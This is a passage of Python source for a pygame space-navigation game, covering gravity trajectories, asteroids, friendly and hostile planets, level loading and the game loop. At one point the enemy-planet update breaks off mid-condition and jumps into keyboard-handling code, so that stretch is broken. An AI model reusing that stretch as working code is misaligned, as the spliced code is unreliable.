self.Surf.blit(leftShuntingEngineImg, (0, 0))\r\n self.fuel-=shuntingEngineConsumption\r\n else:\r\n if self.rightShuntingEngine==True:\r\n self.Surf.blit(rightShuntingEngineImg, (0, 0))\r\n self.fuel-=shuntingEngineConsumption\r\n else:\r\n self.Surf.blit(playerImg, (0, 0))\r\n #define function to check whether player collided with the borders\r\n def checkBorder(self):\r\n collidedBorder=False\r\n #for b in borders.sprites():\r\n # if pygame.sprite.collide_mask(b, self)!=None: collidedBorder=b.position\r\n if self.position.x>=WINDOWWIDTH:\r\n collidedBorder='Right'\r\n elif self.position.y>=WINDOWHEIGHT:\r\n collidedBorder='Bottom'\r\n elif self.position.x<=0:\r\n collidedBorder='Left'\r\n elif self.position.y<=0:\r\n collidedBorder='Top'\r\n\r\n return collidedBorder\r\n\r\n #define new function for ship's behavior after bounce\r\n def bounce(self, borderPosition):\r\n impedeFactor=2.0\r\n if borderPosition=='Left':\r\n self.speed=vector((abs(self.speed.x/impedeFactor), self.speed.y/impedeFactor))\r\n self.fuel-=navigateConsumption\r\n self.speedDelta=vector((0, 0))\r\n elif borderPosition=='Right':\r\n self.speed=vector((-abs(self.speed.x/impedeFactor), self.speed.y/impedeFactor))\r\n self.fuel-=navigateConsumption\r\n self.speedDelta=vector((0, 0))\r\n elif borderPosition=='Top':\r\n self.speed=vector((self.speed.x/impedeFactor, abs(self.speed.y/impedeFactor)))\r\n self.fuel-=navigateConsumption\r\n self.speedDelta=vector((0, 0))\r\n elif borderPosition=='Bottom':\r\n self.speed=vector((self.speed.x/impedeFactor, -abs(self.speed.y/impedeFactor)))\r\n self.fuel-=navigateConsumption\r\n self.speedDelta=vector((0, 0)) \r\n\r\n#function to calculate trajectory with given position, speed and acceleration, planetary system\r\ndef calcTrajectory(position, velocity, field, planetarySystem):\r\n traj=[]\r\n speed=[]\r\n totalForce=vector((0, 0))\r\n endOfTraj=False\r\n \r\n while not endOfTraj:\r\n traj.append(position)\r\n speed.append(velocity)\r\n #define sum of forces\r\n totalForce=field.getField(position)\r\n #define new position and speed\r\n if totalForce!=vector((0, 0)) or velocity!=vector((0, 0)):\r\n position=vecSum(position,vecSum(multSc(deltaT, velocity), multSc(math.pow(deltaT, 2)/2, totalForce)))\r\n velocity=vecSum(velocity, multSc(deltaT,totalForce))\r\n #check end of trajectory\r\n if position.x>=WINDOWWIDTH or position.y>=WINDOWHEIGHT or position.x<=0 or position.y<=0: endOfTraj=True\r\n #check for crash with the plant\r\n for i in planetarySystem.sprites(): #here i is iterable planet\r\n planetVec=i.position\r\n if vecMag(vecDif(position, planetVec))<=i.mass: endOfTraj=True \r\n #limit the number of calculated points\r\n if len(traj)>=3000: endOfTraj=True\r\n else: endOfTraj=True\r\n return zip(traj, speed)\r\n\r\nclass asteroid(pygame.sprite.Sprite):\r\n def __init__(self, position, speed, tailGroup): #position defines center of the planet and has to ba a vector\r\n pygame.sprite.Sprite.__init__(self)\r\n # set position and speed of the asteroid\r\n self.position=position\r\n self.speed=speed\r\n\r\n #set initial image of the asteroid\r\n self.surf=pygame.Surface((10, 10)) \r\n self.surf.blit(asteroidImg,(0,0))\r\n self.surf.set_colorkey(BLACK) \r\n self.image=self.surf\r\n self.mask=pygame.mask.from_surface(self.surf) #create mask for collision\r\n self.rect = pygame.Rect(position.x-5, position.y-5, 10, 10)\r\n\r\n self.tail=asteroidTail(self.position, self.speed)\r\n tailGroup.add(self.tail)\r\n\r\n def update(self, force, liveState):\r\n #update decartes position\r\n # first update position, then - speed \r\n self.position=vecSum(self.position,vecSum(multSc(deltaT, self.speed), multSc(math.pow(deltaT, 2)/2, force)))\r\n self.speed=vecSum(self.speed, multSc(deltaT,force)) \r\n #update image\r\n self.rect=pygame.Rect(self.position.x-5, self.position.y-5, 10, 10)\r\n self.tail.update(self.position, self.speed)\r\n\r\n #check whether the ship is collided\r\n if liveState==False: self.kill()\r\n\r\n def smashAsteroids(self, other, explosionGroup):\r\n explosionCenter=vecSum(self.position, multSc(vecMag(vecDif(self.position, other.position))/2.0, unitVec(vecDif(other.position, self.position))))\r\n explosionGroup.add(explosion(explosionCenter))\r\n if isinstance(other, asteroid):\r\n self.kill()\r\n other.kill()\r\n self.tail.kill()\r\n\r\n def kill(self):\r\n pygame.sprite.Sprite.kill(self)\r\n self.tail.kill() \r\n\r\nclass asteroidTail(pygame.sprite.Sprite):\r\n def __init__(self, astPosition, speed): #position given for tail is the center of its asteroid\r\n pygame.sprite.Sprite.__init__(self)\r\n # set position and speed of the asteroid\r\n self.speed=speed\r\n self.angle=multSc(-1, self.speed).getAngle()\r\n self.position=vecSum(astPosition, multSc(7, unitVec(multSc(-1, self.speed))))\r\n\r\n #set an image of the tial\r\n self.surf=pygame.Surface((10, 15)) \r\n self.surf.blit(asteroidTailImg,(0,0))\r\n self.rotSurf = pygame.transform.rotate(self.surf, math.degrees(self.angle)-90)\r\n self.rotSurf.set_colorkey(BLACK) \r\n \r\n self.image=self.rotSurf\r\n self.rect=self.rotSurf.get_rect().move(self.position.x-self.rotSurf.get_rect().width/2, self.position.y-self.rotSurf.get_rect().height/2)\r\n\r\n def update(self, astPosition, speed):\r\n\r\n self.speed=speed\r\n self.angle=multSc(-1, self.speed).getAngle()\r\n self.position=vecSum(astPosition, multSc(7, unitVec(multSc(-1, self.speed))))\r\n\r\n self.rotSurf = pygame.transform.rotate(self.surf, math.degrees(self.angle)-90)\r\n self.rotSurf.set_colorkey(BLACK) \r\n \r\n self.image=self.rotSurf\r\n self.rect=self.rotSurf.get_rect().move(self.position.x-self.rotSurf.get_rect().width/2, self.position.y-self.rotSurf.get_rect().height/2)\r\n \r\n\r\n# define planet class as sprite\r\nclass planet(pygame.sprite.Sprite):\r\n def __init__(self, mass, color, position): #position defines center of the planet and has to ba a vector\r\n pygame.sprite.Sprite.__init__(self)\r\n self.mass=mass #mass of the planet define gravity magnitude and radius\r\n self.color=color #color just for visualization\r\n self.position=position #position of the planet on screen\r\n self.surf=pygame.Surface((2*mass, 2*mass)) #surface of the planet\r\n self.surf.blit(neutPlanetImg, (0, 0))#draw a planet on planets' surface in center of the surface\r\n self.surf.set_colorkey(BLACK) #set black as transperent color\r\n self.image=self.surf\r\n self.mask=pygame.mask.from_surface(self.surf) #create mask for collision\r\n self.rect = pygame.Rect(position.x-mass, position.y-mass, 2*mass, 2*mass) # mass is subtracted use position as a center\r\n\r\n def update(self, other, plasmaGroup):\r\n pygame.sprite.Sprite.update(self)\r\n \r\n\r\nclass start(pygame.sprite.Sprite):\r\n def __init__(self, position): #position defines center of the start and has to ba a vector\r\n pygame.sprite.Sprite.__init__(self)\r\n self.position=position #position of the start on screen\r\n self.surf=pygame.Surface((20, 20)) #surface of the start\r\n self.surf.blit(startImg, (0, 0))\r\n self.surf.set_colorkey(BLACK) #set black as transperent color\r\n self.image=self.surf\r\n self.mask=pygame.mask.from_surface(self.surf) #create mask for collision\r\n self.rect = pygame.Rect(position.x-10, position.y-10, 20, 20)\r\n\r\nclass finish(pygame.sprite.Sprite):\r\n def __init__(self, position): #position defines center of the start and has to ba a vector\r\n pygame.sprite.Sprite.__init__(self)\r\n self.active=False\r\n self.position=position #position of the start on screen\r\n self.surf=pygame.Surface((20, 20)) #surface of the start\r\n self.surf.blit(finishImg, (0, 0))\r\n self.surf.set_colorkey(BLACK) #set black as transperent color\r\n self.image=self.surf\r\n self.mask=pygame.mask.from_surface(self.surf) #create mask for collision\r\n self.rect = pygame.Rect(position.x-10, position.y-10, 20, 20)\r\n\r\n def activate(self):\r\n self.active=True\r\n self.surf.blit(finishActiveImg, (0, 0))\r\n self.surf.set_colorkey(BLACK) #set black as transperent color\r\n self.image=self.surf\r\n\r\nclass explosion(pygame.sprite.Sprite):\r\n def __init__(self, position): #position defines center of the explosion and has to ba a vector\r\n pygame.sprite.Sprite.__init__(self)\r\n self.explosionFramesCount=0\r\n self.explosionAnimation=explosions\r\n self.position=position\r\n self.Surf=pygame.Surface((16, 16))\r\n self.Surf.set_colorkey(BLACK)\r\n self.image=self.Surf\r\n self.rect=pygame.Rect(self.position.x-8, self.position.y-8, 16, 16)\r\n\r\n def update(self, mineralGroup):\r\n #number of frames for each animation picture\r\n animationFrames=5\r\n numberOfPicture=self.explosionFramesCount//animationFrames\r\n self.Surf.fill(BLACK)\r\n self.Surf.blit(self.explosionAnimation[numberOfPicture], (0, 0))\r\n self.image=self.Surf\r\n self.rect=pygame.Rect(self.position.x-8, self.position.y-8, 16, 16)\r\n self.explosionFramesCount+=1\r\n if self.explosionFramesCount>=FPS:\r\n mineralGroup.add(mineral(self.position))\r\n pygame.sprite.Sprite.kill(self)\r\n\r\n#define class of friendly planet\r\nclass frPlanet(planet):\r\n def __init__(self, mass, color, position):\r\n planet.__init__(self, mass, color, position)\r\n #set friendly planet orbit on planets radius plus 20\r\n self.surf=pygame.Surface((2*mass, 2*mass)) #surface of the planet\r\n self.surf.blit(frPlanetImg,(0,0))#draw a planet on planets' surface in center of the surface\r\n self.surf.set_colorkey(BLACK) #set black as transperent color\r\n self.image=self.surf\r\n self.mask=pygame.mask.from_surface(self.surf) #create mask for collision\r\n self.rect = pygame.Rect(position.x-mass, position.y-mass, 2*mass, 2*mass) # mass is subtracted use position as a center\r\n self.orbitRadius=float(mass+20)\r\n #define speed of ship on the orbit in number of turns over planet in one frame\r\n self.orbitalSpeed=1.0/(7.0*FPS)\r\n self.orbit=[]\r\n alpha=0\r\n for i in range(int(1/self.orbitalSpeed)):\r\n x=self.position.x+int(self.orbitRadius*math.cos(alpha))\r\n y=self.position.y-int(self.orbitRadius*math.sin(alpha))\r\n try:\r\n if self.orbit[len(self.orbit)-1]!=(x, y):\r\n self.orbit.append((x, y))\r\n except:\r\n self.orbit.append((self.position.x+int(self.orbitRadius), self.position.y))\r\n alpha+=2.0*math.pi*self.orbitalSpeed\r\n\r\n def takeOnOrbit(self, other):\r\n if isinstance(other, battleShip):\r\n deltaAngle=0.0\r\n other.onOrbit=True\r\n other.fuel=10\r\n #returns the list of three numbers: x speed of the ship, y speed of the ship, delta of the ship's angle\r\n #find nearest orbit's point\r\n if (int(other.position.x), int(other.position.y)) in self.orbit:\r\n point=self.orbit.index((int(other.position.x), int(other.position.y)))\r\n nextPoint=point+1\r\n if nextPoint>len(self.orbit)-1:\r\n nextPoint=nextPoint%len(self.orbit)\r\n xSpeed=self.orbit[nextPoint][0]-self.orbit[point][0]\r\n ySpeed=self.orbit[nextPoint][1]-self.orbit[point][1]\r\n else:\r\n nearestPoint=min(self.orbit, key=lambda i: math.pow(i[0]-other.position.x, 2)+math.pow(i[1]-other.position.y, 2))\r\n nextPoint=self.orbit.index(nearestPoint)\r\n xSpeed=self.orbit[nextPoint][0]-other.position.x\r\n ySpeed=self.orbit[nextPoint][1]-other.position.y\r\n other.speedDelta=vector((xSpeed, ySpeed))\r\n\r\n#define cless of foe planet\r\nclass foePlanet(planet):\r\n def __init__(self, mass, color, position, fireRadius):\r\n planet.__init__(self, mass, color, position)\r\n self.surf=pygame.Surface((2*mass, 2*mass)) #surface of the planet\r\n self.surf.blit(foePlanetImg,(0,0))#draw a planet on planets' surface in center of the surface\r\n self.surf.set_colorkey(BLACK) #set black as transperent color\r\n self.image=self.surf\r\n self.mask=pygame.mask.from_surface(self.surf) #create mask for collision\r\n self.rect = pygame.Rect(position.x-mass, position.y-mass, 2*mass, 2*mass) # mass is subtracted use position as a center\r\n #set fire radius\r\n self.fireRadius=(mass+fireRadius)\r\n #set shot interval as internal constant\r\n self.shotInterval=3*FPS\r\n self.timeFromLastShot=self.shotInterval\r\n\r\n def update(self, other, plasmaGroup):\r\n planet.update(self, other, plasmaGroup)\r\n if self.timeFromLastShot=0:\r\n game.playerShip.speedDelta=vecSum(game.playerShip.speedDelta, vector((engine*math.cos(game.playerShip.angle), -engine*math.sin(game.playerShip.angle))))#engines work and ship moves forward\r\n game.playerShip.mainEngine=True\r\n game.playerShip.onOrbit=False\r\n game.playerShip.changeTrajectory=True\r\n\r\n elif keys[pygame.K_RIGHT]!=0 and game.playerShip.fuel>=0:\r\n game.playerShip.angleDelta-=rotSpeed# left shunting engine is on and ship slightly rotates clockwise\r\n game.playerShip.leftShuntingEngine=True\r\n\r\n elif keys[pygame.K_LEFT]!=0 and game.playerShip.fuel>=0:\r\n game.playerShip.angleDelta+=rotSpeed# right shunting engine is on and ship slightly rotates counter-clockwise\r\n game.playerShip.rightShuntingEngine=True\r\n\r\n elif keys[pygame.K_SPACE]!=0 and previousKeys[pygame.K_SPACE]==0 and game.playerShip.fuel>=0:\r\n #if space is pushed asteroid catcher is on\r\n game.playerShip.catcherOn=not game.playerShip.catcherOn\r\n\r\n elif keys[pygame.K_PAUSE]!=0 and previousKeys[pygame.K_PAUSE]==0 and game.paused==False:\r\n game.paused=True\r\n\r\n elif game.gameMode.name in ['finish', 'death', 'main menu', 'finish random', 'training death', 'training finish', 'help', 'win', 'training win']:\r\n for event in pygame.event.get():\r\n if event.type==MOUSEBUTTONDOWN:\r\n game.mousePressed=pygame.mouse.get_pos()\r\n elif event.type == pygame.QUIT:\r\n pygame.quit()\r\n sys.exit()\r\n\r\n#define a class of game mode\r\nclass mode():\r\n def __init__(self, name, buttons):\r\n self.name=name\r\n self.buttons=buttons\r\n\r\n#class that stores imformation on the game level\r\nclass level():\r\n def __init__(self, number, mode='campaign'):\r\n self.number=number\r\n self.startGroup=pygame.sprite.Group()\r\n self.finishGroup=pygame.sprite.Group()\r\n self.planetarySystem=pygame.sprite.Group()\r\n #set asteroids\r\n self.asteroidBelt=pygame.sprite.Group()\r\n self.tailGroup=pygame.sprite.Group()\r\n self.asteroidSpawnPoints=[]\r\n #set plasma\r\n self.plasmaShots=pygame.sprite.Group()\r\n #set explosions\r\n self.explosionGroup=pygame.sprite.Group()\r\n #set group of minerls sprites\r\n self.minerals=pygame.sprite.Group()\r\n self.load(self.number, mode)\r\n\r\n def load(self, number, mode='campaign'):\r\n self.number=number\r\n self.startGroup.empty()\r\n self.finishGroup.empty()\r\n self.planetarySystem.empty()\r\n self.asteroidBelt.empty()\r\n self.tailGroup.empty()\r\n self.plasmaShots.empty()\r\n self.explosionGroup.empty()\r\n self.minerals.empty()\r\n self.asteroidSpawnPoints=[]\r\n self.requiredMinerals=0\r\n self.pausedLabels=[]\r\n self.pausedLabels.append(label((280, 550),\"Press any key to resume game\", 30, 0, 0, 0, RED))\r\n self.winSituation=False\r\n self.trWinSituation=False\r\n levelLoaded=False\r\n if mode=='campaign':\r\n levelFile=open(\"levels\", \"r\")\r\n elif mode=='training':\r\n levelFile=open(\"trLevels\", \"r\")\r\n while not levelLoaded:\r\n strLevelNumber=''\r\n line=levelFile.readline().rstrip()\r\n if line=='':\r\n if mode=='campaign': self.winSituation=True\r\n elif mode=='training':\r\n self.trWinSituation=True\r\n break\r\n #check that we read needed level\r\n if line[0]=='#':\r\n for i in range(1, len(line)):\r\n strLevelNumber+=line[i]\r\n if strLevelNumber=='': strLevelNumber='0'\r\n if self.number==int(strLevelNumber):\r\n #read block of strings line by line with planet coordinates and other parameters\r\n while line[0]!='-':\r\n line=levelFile.readline().rstrip()\r\n if line=='planets':\r\n line=levelFile.readline().rstrip()\r\n while line!='.':\r\n planetParams=line.split(' ')\r\n try:\r\n self.planetarySystem.add(planet(int(planetParams[2]), BLUE, vector((int(planetParams[0]), int(planetParams[1])))))\r\n except: pass\r\n line=levelFile.readline().rstrip()\r\n elif line=='frPlanets':\r\n line=levelFile.readline()\r\n while line!='.':\r\n planetParams=line.split(' ')\r\n try:\r\n self.planetarySystem.add(frPlanet(int(planetParams[2]), GREEN, vector((int(planetParams[0]), int(planetParams[1])))))\r\n except: pass\r\n line=levelFile.readline().rstrip()\r\n elif line=='foePlanets':\r\n line=levelFile.readline().rstrip()\r\n while line!='.':\r\n planetParams=line.split(' ')\r\n try:\r\n self.planetarySystem.add(foePlanet(int(planetParams[2]), RED, vector((int(planetParams[0]), int(planetParams[1]))), int(planetParams[3])))\r\n except: pass\r\n line=levelFile.readline().rstrip()\r\n elif line=='asteroidSpawnPoints':\r\n line=levelFile.readline().rstrip()\r\n while line!='.':\r\n parameters=line.split(' ')\r\n try:\r\n self.asteroidSpawnPoints.append(asteroidSpawnSpot(vector((int(parameters[0]), int(parameters[1]))), vector((parameters[2], parameters[3])), int(parameters[4]), self.planetarySystem, self.asteroidBelt,\r\n self.tailGroup))\r\n except IndexError: pass\r\n line=levelFile.readline().rstrip()\r\n elif line=='minerals':\r\n line=levelFile.readline().rstrip()\r\n while line!='.':\r\n parameters=line.split(' ')\r\n try:\r\n self.minerals.add(mineral(vector((int(parameters[0]), int(parameters[1])))))\r\n except: pass\r\n line=levelFile.readline().rstrip()\r\n elif line=='required minerals':\r\n line=levelFile.readline().rstrip()\r\n while line!='.':\r\n parameters=line.split(' ')\r\n try:\r\n self.requiredMinerals=int(parameters[0])\r\n except: pass\r\n line=levelFile.readline().rstrip() \r\n elif line=='labels':\r\n line=levelFile.readline().rstrip()\r\n while line!='.':\r\n parameters=[]\r\n if line[0]=='?': text=line[1:]\r\n else:\r\n parameters=line.split(' ')\r\n try:\r\n if parameters!=[]:\r\n self.pausedLabels.append(label((int(parameters[0]), int(parameters[1])), text, int(parameters[2]), int(parameters[3]), int(parameters[4]), int(parameters[5])))\r\n except IndexError: pass\r\n line=levelFile.readline().rstrip()\r\n elif line=='start':\r\n line=levelFile.readline().rstrip()\r\n while line!='.':\r\n parameters=line.split(' ')\r\n self.start=vector((int(parameters[0]), int(parameters[1])))\r\n self.startGroup.add(start(self.start))\r\n line=levelFile.readline().rstrip()\r\n elif line=='finish':\r\n line=levelFile.readline().rstrip()\r\n while line!='.':\r\n parameters=line.split(' ')\r\n self.finish=vector((int(parameters[0]), int(parameters[1])))\r\n self.finishGroup.add(finish(self.finish))\r\n line=levelFile.readline().rstrip()\r\n levelLoaded=True\r\n levelFile.close()\r\n #method to create random level\r\n def getRandom(self):\r\n random.seed()\r\n #clear current level\r\n self.startGroup.empty()\r\n self.finishGroup.empty()\r\n self.planetarySystem.empty()\r\n self.asteroidBelt.empty()\r\n self.tailGroup.empty()\r\n self.plasmaShots.empty()\r\n self.explosionGroup.empty()\r\n self.asteroidSpawnPoints=[]\r\n #set group of minerls sprites\r\n self.minerals=pygame.sprite.Group()\r\n self.requiredMinerals=0\r\n self.pausedLabels=[]\r\n\r\n #define the number of level objects\r\n numberPlanets=random.randint(1,7)\r\n numberFrPlanets=random.randint(1,3)\r\n numberFoePlanets=random.randint(1,3)\r\n numberAsteroidSpawnPoints=random.randint(1,3)\r\n\r\n #set loops controllers\r\n levelSet=False\r\n planetsSet=False\r\n frPlanetsSet=False\r\n foePlanetsSet=False\r\n asteroidSpawnSpotsSet=False\r\n startSet=False\r\n finishSet=False\r\n\r\n while not levelSet:\r\n #set planets\r\n i=0\r\n while not planetsSet:\r\n newMass=40\r\n newX=random.randint(newMass, WINDOWWIDTH-newMass)\r\n newY=random.randint(newMass, WINDOWHEIGHT-newMass)\r\n newPosition=vector((newX, newY))\r\n if self.planetarySystem.sprites()==[]:\r\n self.planetarySystem.add(planet(newMass, BLUE, newPosition))\r\n else:\r\n overlap=0\r\n for p in self.planetarySystem.sprites():\r\n if vecMag(vecDif(newPosition, p.position))<=(newMass+p.mass):\r\n overlap+=1\r\n if overlap==0:\r\n self.planetarySystem.add(planet(newMass, BLUE, newPosition))\r\n i+=1\r\n if i==numberPlanets: planetsSet=True\r\n\r\n #set friendly planets\r\n i=0\r\n while not frPlanetsSet:\r\n newMass=40\r\n newX=random.randint(newMass, WINDOWWIDTH-newMass)\r\n newY=random.randint(newMass, WINDOWHEIGHT-newMass)\r\n newPosition=vector((newX, newY))\r\n overlap=0\r\n for p in self.planetarySystem.sprites():\r\n if isinstance(p, frPlanet) and vecMag(vecDif(newPosition, p.position))<=(newMass+20+p.orbitRadius):\r\n overlap+=1\r\n elif vecMag(vecDif(newPosition, p.position))<=(newMass+20+p.mass):\r\n overlap+=1\r\n if overlap==0:\r\n self.planetarySystem.add(frPlanet(newMass, GREEN, newPosition))\r\n i+=1\r\n if i==numberFrPlanets: frPlanetsSet=True\r\n\r\n #set foe planets\r\n i=0\r\n while not foePlanetsSet:\r\n newMass=40\r\n newX=random.randint(newMass, WINDOWWIDTH-newMass)\r\n newY=random.randint(newMass, WINDOWHEIGHT-newMass)\r\n newPosition=vector((newX, newY))\r\n newFireRadius=random.randint(20, 70)\r\n overlap=0\r\n for p in self.planetarySystem.sprites():\r\n if isinstance(p, frPlanet) and vecMag(vecDif(newPosition, p.position))<=(newMass+p.orbitRadius):\r\n overlap+=1\r\n elif vecMag(vecDif(newPosition, p.position))<=(newMass+p.mass):\r\n overlap+=1\r\n if overlap==0:\r\n self.planetarySystem.add(foePlanet(newMass, RED, newPosition, newFireRadius))\r\n i+=1\r\n if i==numberFoePlanets: foePlanetsSet=True\r\n\r\n #set asteroid spawn spots\r\n i=0\r\n while not asteroidSpawnSpotsSet:\r\n #asteroid spawn spots are alonge the edges of the window\r\n newX=random.randint(5, WINDOWWIDTH-5)\r\n newY=random.randint(5, WINDOWHEIGHT-5)\r\n seq=((5, newY), (newX, 5), (WINDOWWIDTH-5, newY), (newX, WINDOWHEIGHT-5))\r\n newPosition=vector(random.choice(seq))\r\n #set direction of the asteroids speed\r\n if newPosition.x==5: newXSpeed=random.randint(1, 4)\r\n elif newPosition.x==WINDOWWIDTH-5: newXSpeed=random.randint(-4, -1)\r\n else: newXSpeed=random.randint(-4, 4)\r\n if newPosition.y==5: newYSpeed=random.randint(1, 4)\r\n elif newPosition.y==WINDOWHEIGHT-5: newYSpeed=random.randint(-4, -1)\r\n else: newYSpeed=random.randint(-4, 4)\r\n newSpeed=vector((newXSpeed, newYSpeed))\r\n #set asteroid interval\r\n newInterval=random.randint(10, 60)\r\n #add new asteroid spawn spot\r\n self.asteroidSpawnPoints.append(asteroidSpawnSpot(newPosition, newSpeed, newInterval, self.planetarySystem, self.asteroidBelt, self.tailGroup))\r\n i+=1\r\n if i==numberAsteroidSpawnPoints: asteroidSpawnSpotsSet=True\r\n\r\n #set start\r\n i=0\r\n while not startSet:\r\n newX=random.randint(newMass, WINDOWWIDTH-newMass)\r\n newY=random.randint(newMass, WINDOWHEIGHT-newMass)\r\n newPosition=vector((newX, newY))\r\n overlap=0\r\n for p in self.planetarySystem.sprites():\r\n if isinstance(p, frPlanet) and vecMag(vecDif(newPosition, p.position))<=(10+p.orbitRadius):\r\n overlap+=1\r\n elif vecMag(vecDif(newPosition, p.position))<=(10+p.mass):\r\n overlap+=1\r\n if overlap==0:\r\n self.startGroup.add(start(newPosition))\r\n self.start=newPosition\r\n i+=1\r\n if i==1: startSet=True\r\n\r\n #set finish\r\n i=0\r\n while not finishSet:\r\n newX=random.randint(newMass, WINDOWWIDTH-newMass)\r\n newY=random.randint(newMass, WINDOWHEIGHT-newMass)\r\n newPosition=vector((newX, newY))\r\n overlap=0\r\n for p in self.planetarySystem.sprites():\r\n if isinstance(p, frPlanet) and vecMag(vecDif(newPosition, p.position))<=(10+p.orbitRadius):\r\n overlap+=1\r\n elif vecMag(vecDif(newPosition, p.position))<=(10+p.mass):\r\n overlap+=1\r\n if overlap==0:\r\n self.finishGroup.add(finish(newPosition))\r\n self.finish=newPosition\r\n i+=1\r\n if i==1: finishSet=True\r\n levelSet=True\r\n\r\n#define a class with key game mechanics for each game mode\r\nclass game():\r\n def __init__(self, gameMode):\r\n self.gameMode=gameMode\r\n self.mousePressed=(0,0)\r\n self.paused=False\r\n self.deathClock=0 #this counts for 40 frames after each collision\r\n self.finishClock=0 #counts for 40 frames after finish moment \r\n\r\n def update(self, displaySurf):\r\n global currentLevelNumber\r\n if self.gameMode.name=='main menu':\r\n displaySurf.blit(menuBackground, (0,0))\r\n headText=hugeFont.render(\"Space adventures\", 1, titleColor)\r\n headTextWidth, headTextHeight=hugeFont.size(\"Space adventures\")\r\n displaySurf.blit(headText, (400-int(headTextWidth/2), 230-int(headTextHeight/2)))\r\n displaySurf.blit(mainMenuImg, (400-int(headTextWidth/2), 130-int(headTextHeight/2)))\r\n \r\n #draw main menu\r\n for b in self.gameMode.buttons:\r\n b.update(displaySurf, self.mousePressed)\r\n #??if any button pressed - change game mode accordingly\r\n if b.buttonPressed==True:\r\n if b.text=='NEW CAMPAIGN':\r\n currentLevelNumber=1\r\n self.currentLevel=level(1) \r\n self.changeMode(campaignMode)\r\n if b.text=='RESUME CAMPAIGN':\r\n self.currentLevel=level(currentLevelNumber)\r\n self.changeMode(campaignMode)\r\n elif b.text=='HOW TO PLAY':\r\n self.currentLevel=level(1, 'training')\r\n self.changeMode(trainingMode)\r\n elif b.text=='RANDOM MAP':\r\n randomLevelMode=mode('random level', [])\r\n self.currentLevel=level(1)\r\n self.currentLevel.getRandom()\r\n self.changeMode(randomLevelMode)\r\n elif b.text=='HELP':\r\n self.changeMode(helpPageMode)\r\n elif b.text=='EXIT':\r\n pygame.quit()\r\n sys.exit()\r\n b.buttonPressed=False\r\n self.mousePressed=(0,0)\r\n \r\n pygame.display.update()\r\n FPSCLOCK.tick(FPS)\r\n \r\n \r\n elif self.gameMode.name=='campaign' or self.gameMode.name=='random level' or self.gameMode.name=='training':\r\n #print ('started game mode')\r\n displaySurf.blit(background, (0, 0)) \r\n gravity=vector((0,0))\r\n astGravity=vector((0,0))\r\n \r\n #print('calculate gravity force for player ship')\r\n gravity=self.levelGravity.getField(self.playerShip.position)\r\n\r\n #print('for friendly planets check that player is on the orbit') \r\n for i in self.planetarySystem.sprites():\r\n if isinstance(i, frPlanet):\r\n if vecMag(vecDif(i.position, self.playerShip.position))<=i.orbitRadius+1: #+1 here used as a kind of tolerance \r\n if self.playerShip.mainEngine==False:\r\n i.takeOnOrbit(self.playerShip)\r\n\r\n #print('asteroids position and collision check')\r\n for ast in self.asteroidBelt.sprites():\r\n astGravity=self.levelGravity.getField(ast.position)\r\n astAlive=True\r\n #check on collisions with planets\r\n for i in self.planetarySystem.sprites():\r\n if pygame.sprite.collide_mask(i, ast)!=None: astAlive=False\r\n \r\n #check on collisions with borders\r\n if ast.position.x>=800 or ast.position.y>=600 or ast.position.x<=0 or ast.position.y<=0: astAlive=False\r\n #check on collision with player\r\n if pygame.sprite.collide_mask(ast, self.playerShip)!=None:\r\n self.playerShip.alive=False\r\n astAlive=False\r\n if self.deathClock==0:\r\n self.deathClock+=1\r\n shipExplosionSound.play(loops=0, maxtime=2000)\r\n if not self.paused: ast.update(astGravity, astAlive)\r\n #check on collision of two asteroids\r\n for ast2 in self.asteroidBelt.sprites():\r\n if ast2.position!=ast.position:\r\n if pygame.sprite.collide_mask(ast, ast2)!=None: ast.smashAsteroids(ast2, self.explosionGroup) \r\n \r\n #print('plasma shots collision check')\r\n for shot in self.plasmaShots.sprites():\r\n shotAlive=True\r\n if pygame.sprite.collide_mask(shot, self.playerShip)!=None:\r\n self.playerShip.alive=False\r\n shotAlive=False\r\n if self.deathClock==0:\r\n self.deathClock+=1\r\n shipExplosionSound.play(loops=0, maxtime=2000)\r\n if not self.paused: shot.update(shotAlive)\r\n \r\n #print('player collision with planet check')\r\n for i in self.planetarySystem.sprites():\r\n if pygame.sprite.collide_mask(i, self.playerShip)!=None:\r\n self.playerShip.alive=False\r\n if self.deathClock==0:\r\n self.deathClock+=1\r\n shipExplosionSound.play(loops=0, maxtime=2000)\r\n\r\n #print('finish check')\r\n \r\n if self.playerShip.mineralCount>=self.requiredMinerals:\r\n for i in self.finishGroup.sprites():\r\n if pygame.sprite.collide_mask(i, self.playerShip)!=None:\r\n self.playerShip.finish=True\r\n if self.finishClock==0:\r\n self.finishClock+=1\r\n #finishSound.play(loops=0)\r\n \r\n\r\n #print('border check')\r\n if self.playerShip.checkBorder():\r\n self.playerShip.bounce(self.playerShip.checkBorder())\r\n if self.playerShip.fuel<=0:\r\n if self.gameMode.name=='campaign': self.changeMode(deathMode)\r\n elif self.gameMode.name=='training': self.changeMode(trDeathMode)\r\n elif self.gameMode.name=='random level': self.changeMode(finishRandomMode)\r\n self.playerShip.kill()\r\n \r\n #minerals collision check\r\n for m in self.minerals.sprites():\r\n if pygame.sprite.collide_mask(m, self.playerShip)!=None:\r\n self.playerShip.mineralCount+=1\r\n m.kill()\r\n \r\n if not self.paused:\r\n # update the ship with engine flames\r\n self.playerShip.engineFlames()\r\n self.ships.update(gravity, self.asteroidBelt)\r\n #throw away used point in trajectory\r\n if not self.playerShip.changeTrajectory:\r\n if self.playerShip.trajectory!=[]: self.playerShip.trajectory.pop(0)\r\n \r\n \r\n #print('update asteroids')\r\n for point in self.asteroidSpawnPoints:\r\n point.update(self.asteroidBelt, self.tailGroup)\r\n\r\n #print('update planetary system')\r\n self.planetarySystem.update(self.playerShip, self.plasmaShots)\r\n\r\n #update explosions\r\n self.explosionGroup.update(self.minerals)\r\n \r\n\r\n #draw fuel level\r\n #define top left corner of the left bar of fuel\r\n currentCorner=(770, 40)\r\n if self.playerShip.fuel//1>0:\r\n for bar in range(int(self.playerShip.fuel)):\r\n fuelBar=pygame.Rect(currentCorner, (15, 40))\r\n pygame.draw.rect(displaySurf, ORANGE, fuelBar)\r\n currentCorner=(currentCorner[0]-20, currentCorner[1])\r\n if self.playerShip.fuel%1>0 and self.playerShip.fuel>0:\r\n fuelBar=pygame.Rect(currentCorner, (15, int(40*(self.playerShip.fuel%1))))\r\n pygame.draw.rect(displaySurf, ORANGE, fuelBar)\r\n\r\n #print('draw the trajectory calculate only if it is changed')\r\n if self.playerShip.onOrbit==False and self.playerShip.alive==True:\r\n if self.playerShip.changeTrajectory==True:\r\n #engineSound.play(loops=0, maxtime=1000)\r\n 